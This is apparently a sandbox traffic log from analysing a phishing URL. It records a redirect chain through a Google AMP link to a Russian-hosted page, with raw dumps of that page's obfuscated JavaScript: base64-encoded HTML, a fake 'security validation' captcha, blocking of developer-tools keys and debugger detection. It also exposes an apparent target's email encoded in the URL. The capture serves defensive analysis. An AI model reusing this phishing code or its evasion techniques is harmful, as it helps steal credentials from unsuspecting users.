                                                                          Date: Tue, 14 Jan 2025 21:50:21 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Server: nginx/1.27.3
                                                                          Location: https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449744142.250.185.784434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:22 UTC752OUTGET /amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3 HTTP/1.1
                                                                          Host: google.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:23 UTC936INHTTP/1.1 301 Moved Permanently
                                                                          Location: https://www.google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-cvdZguGsmRoj2z-qpPclGg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Tue, 14 Jan 2025 21:50:23 GMT
                                                                          Expires: Thu, 13 Feb 2025 21:50:23 GMT
                                                                          Cache-Control: public, max-age=2592000
                                                                          Server: gws
                                                                          Content-Length: 319
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2025-01-14 21:50:23 UTC319INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 6d 70 2f 61 76 72 61 6e 63 65 63 6f 72 70 2e 63 6f 6d 2f 77 70 2d 77 65 62 2f 47 72 69 66 66 69 6e 77 69 6e 6b 2f 36 34 36 31 36 62 36 66 37 34 36 31 36 63 37 39 36 65 36 65 34 30 36 37 37
                                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e40677


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.449740142.250.65.1644434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:23 UTC756OUTGET /amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3 HTTP/1.1
                                                                          Host: www.google.com
                                                                          Connection: keep-alive
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-User: ?1
                                                                          Sec-Fetch-Dest: document
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:23 UTC1262INHTTP/1.1 302 Found
                                                                          Location: http://avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3
                                                                          Cache-Control: private
                                                                          X-Robots-Tag: noindex
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-iG2uXGJTjqrCwsH2AoXqsg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                          Permissions-Policy: unload=()
                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                          Date: Tue, 14 Jan 2025 21:50:23 GMT
                                                                          Server: gws
                                                                          Content-Length: 299
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Set-Cookie: NID=520=qqVTCPjP73AplUFCJY1Fh18DRsd632bAg1E4h4K1rFYrv3gOS_RjJZkd-LuAKcxW57tm8yraxxirKB23zrogUZtbbMCMif7AUfVQ6fb4aIUQ6ZD-PXd2dL3EH05TY_Svmf0i73mjbnpdo6fz7zD3eBPsOK4N8qKR4TwaS7dRPdNz1d1_5iUbw3PEz7INqids-QjVSZLq; expires=Wed, 16-Jul-2025 21:50:23 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2025-01-14 21:50:23 UTC128INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76
                                                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Mov
                                                                          2025-01-14 21:50:23 UTC171INData Raw: 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 61 76 72 61 6e 63 65 63 6f 72 70 2e 63 6f 6d 2f 77 70 2d 77 65 62 2f 47 72 69 66 66 69 6e 77 69 6e 6b 2f 36 34 36 31 36 62 36 66 37 34 36 31 36 63 37 39 36 65 36 65 34 30 36 37 37 32 36 39 36 36 36 36 36 39 36 65 37 37 36 39 36 65 36 62 32 65 36 33 36 66 36 64 2f 24 5a 47 46 72 62 33 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                          Data Ascii: ed</H1>The document has moved<A HREF="http://avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3">here</A>.</BODY></HTML>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.44974950.6.174.344434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:25 UTC452OUTGET /404.shtml HTTP/1.1
                                                                          Host: avrancecorp.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: http://avrancecorp.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.449751104.21.96.14434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:25 UTC685OUTGET /Z1cxl9eG/ HTTP/1.1
                                                                          Host: wv.bomirax.ru
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Referer: http://avrancecorp.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:26 UTC1242INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: no-cache, private
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q719xauKx9O5f6qg3ar31q0AfOc%2BAK5jqf2fA55E%2FTxswnS%2BgMkwZYjBHlzBMN5F62J7YuamBJFNoCLsdrivNxtNyJH5PPYQFhTbQloS1I3un5keqqOEh1SUkfcXPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1282&min_rtt=1271&rtt_var=500&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1586&delivery_rate=2087976&cwnd=251&unsent_bytes=0&cid=b06c1bafec50eb49&ts=238&x=0"
                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IkdCOVdRZ1VXdlBVR2l6TlFJWEJyUkE9PSIsInZhbHVlIjoiTC9PZ2ZseC81blhSOHJaZ21RaTdSWndoWWJzYUIwZHVsTWhyQ1FNMUhXZTI5ZE1tNSs1bEVFdm9ZazRwMS9PajVOcTloSGZoMlJYbEpzajA5S0M4eW01c2JCdUE0eVU5Rmg4WnIrQTM4TUlKNnVTWFMyYkVCNnloN0dVYTB5dEMiLCJtYWMiOiI3ZTY1NGEwNmFkZmNkNWU4NDkxZmE0MzI3NjA0N2IzNDE3MDZiMDVlMTAxNjBkYzZiMzgwOWFhMWI5YWFiMmU1IiwidGFnIjoiIn0%3D; expires=Tue, 14-Jan-2025 23:50:25 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                          2025-01-14 21:50:26 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 70 52 59 6c 5a 75 53 45 35 4d 63 45 64 4e 52 30 56 46 5a 58 64 4c 52 55 46 58 65 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 54 5a 4d 5a 45 74 50 55 46 42 6f 59 6d 39 46 5a 46 4a 30 4f 57 70 78 52 6b 64 56 53 47 68 30 61 6c 56 77 56 6c 70 79 4e 57 31 44 64 6b 78 36 64 48 5a 4d 63 45 31 6e 4e 54 41 31 53 46 46 33 64 30 59 79 4d 6d 5a 42 61 6c 46 47 59 6b 78 76 61 46 70 59 55 46 52 76 52 6e 70 50 4e 32 59 78 52 55 77 31 61 7a 6c 68 54 6e 6c 49 64 54 56 70 53 32 68 43 4f 44 51 30 64 33 68 57 61 6e 56 69 5a 31 4a 42 4e 57 45 35 4f 55 4e 52 59 57 77 31 5a 32 30 78 52 32 6c 79 4d 46 68 59 55 54 52 61 62 6c 56 33 59 6b 70 4a 5a 47 55
                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlpRYlZuSE5McEdNR0VFZXdLRUFXeXc9PSIsInZhbHVlIjoiUTZMZEtPUFBoYm9FZFJ0OWpxRkdVSGh0alVwVlpyNW1Ddkx6dHZMcE1nNTA1SFF3d0YyMmZBalFGYkxvaFpYUFRvRnpPN2YxRUw1azlhTnlIdTVpS2hCODQ0d3hWanViZ1JBNWE5OUNRYWw1Z20xR2lyMFhYUTRablV3YkpJZGU
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 34 64 37 64 0d 0a 3c 21 2d 2d 20 53 74 6f 70 20 63 68 61 73 69 6e 67 20 74 68 65 20 6d 6f 6e 65 79 20 61 6e 64 20 73 74 61 72 74 20 63 68 61 73 69 6e 67 20 74 68 65 20 70 61 73 73 69 6f 6e 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 47 64 54 45 75 59 6d 39 74 61 58 4a 68 65 43 35 79 64 53 39 61 4d 57 4e 34 62 44 6c 6c 52 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44
                                                                          Data Ascii: 4d7d... Stop chasing the money and start chasing the passion. --><script>if(atob("aHR0cHM6Ly9GdTEuYm9taXJheC5ydS9aMWN4bDllRy8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 51 56 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 4a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 32 4a
                                                                          Data Ascii: QVouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTJweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI2J
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67
                                                                          Data Ascii: nByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAg
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 41 67 49 47 4e 76 62 6e 4e 30 49 47 70 69 63 56 5a 4a 63 55 4a 77 56 32 49 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 70 69 63 56 5a 4a 63 55 4a 77 56 32 49 67 4c 53 42 68 63 45 68 54 56 6e 46 5a 52 31 5a 4b 49 44 34 67 61 45 31 5a 63 31 70 75 5a 56 42 43 57 43 41 6d 4a 69 41 68 57 56 46 57 53 56 56 34 65 6d 68 4d 51 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 55 56 56 58 61 45 46 54 61 57 64 70 62 69 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 5a 55 56 5a 4a 56 58 68 36 61 45 78 42 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64
                                                                          Data Ascii: AgIGNvbnN0IGpicVZJcUJwV2IgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKGpicVZJcUJwV2IgLSBhcEhTVnFZR1ZKID4gaE1Zc1puZVBCWCAmJiAhWVFWSVV4emhMQSkgew0KICAgICAgICAgICAgUVVXaEFTaWdpbiA9IHRydWU7DQogICAgICAgICAgICBZUVZJVXh6aExBID0gdHJ1ZTsNCiAgICAgICAgICAgIHdpbmRvd
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 79 52 57 56 30 5a 47 4e 52 64 6b 70 48 49 6a 34 4e 43 6b 4e 76 62 6d 52 31 59 33 52 70 62 6d 63 67 63 32 56 6a 64 58 4a 70 64 48 6b 67 64 6d 46 73 61 57 52 68 64 47 6c 76 62 69 42 76 62 69 42 35 62 33 56 79 49 47 4a 79 62 33 64 7a 61 57 35 6e 49 48 4e 76 5a 6e 52 33 59 58 4a 6c 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a
                                                                          Data Ascii: kZGVuIiBpZD0iYmx0ZGRhdGEiIG5hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iIj4NCjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0idGV4dC1jZW50ZXIiIGlkPSJyRWV0ZGNRdkpHIj4NCkNvbmR1Y3Rpbmcgc2VjdXJpdHkgdmFsaWRhdGlvbiBvbiB5b3VyIGJyb3dzaW5nIHNvZnR3YXJlLg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCj
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 73 64 6c 70 53 61 31 5a 55 59 55 6c 73 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 46 46 56 56 32 68 42 55 32 6c 6e 61 57 34 67 50 54 30 67 5a 6d 46 73 63 32 55 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42
                                                                          Data Ascii: dyBGb3JtRGF0YShsdlpSa1ZUYUlsKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGlmKFFVV2hBU2lnaW4gPT0gZmFsc2Upew0KICAgICAgICB
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 6d 59 53 70 69 75 52 6e 53 56 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 6d 59 53 70 69 75 52 6e 53 56 2e 70 61 74 68 6e 61 6d 65 20 3d 20 6d 59 53 70 69 75 52 6e 53 56 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 46 55 64 62 76 44 70 76 72 53 20 3d 20 6d 59 53 70 69 75 52 6e 53 56 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 46 55 64 62 76 44 70 76 72 53 20 3d 3d 20 62 4a 4b 43 56 62 59 4e 53 6b 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42
                                                                          Data Ascii: .split('%3F')[0];if (mYSpiuRnSV.pathname.endsWith('/')) {mYSpiuRnSV.pathname = mYSpiuRnSV.pathname.slice(0, -1);}const FUdbvDpvrS = mYSpiuRnSV.pathname+'/';if(FUdbvDpvrS == bJKCVbYNSk){document.write(decodeURIComponent(escape(atob('PCFET0NUWVB
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 4a 4a 52 56 4e 46 51 55 31 75 51 56 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 54 4a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e
                                                                          Data Ascii: DttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2JJRVNFQU1uQVouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogOTJweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmln
                                                                          2025-01-14 21:50:26 UTC1369INData Raw: 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64
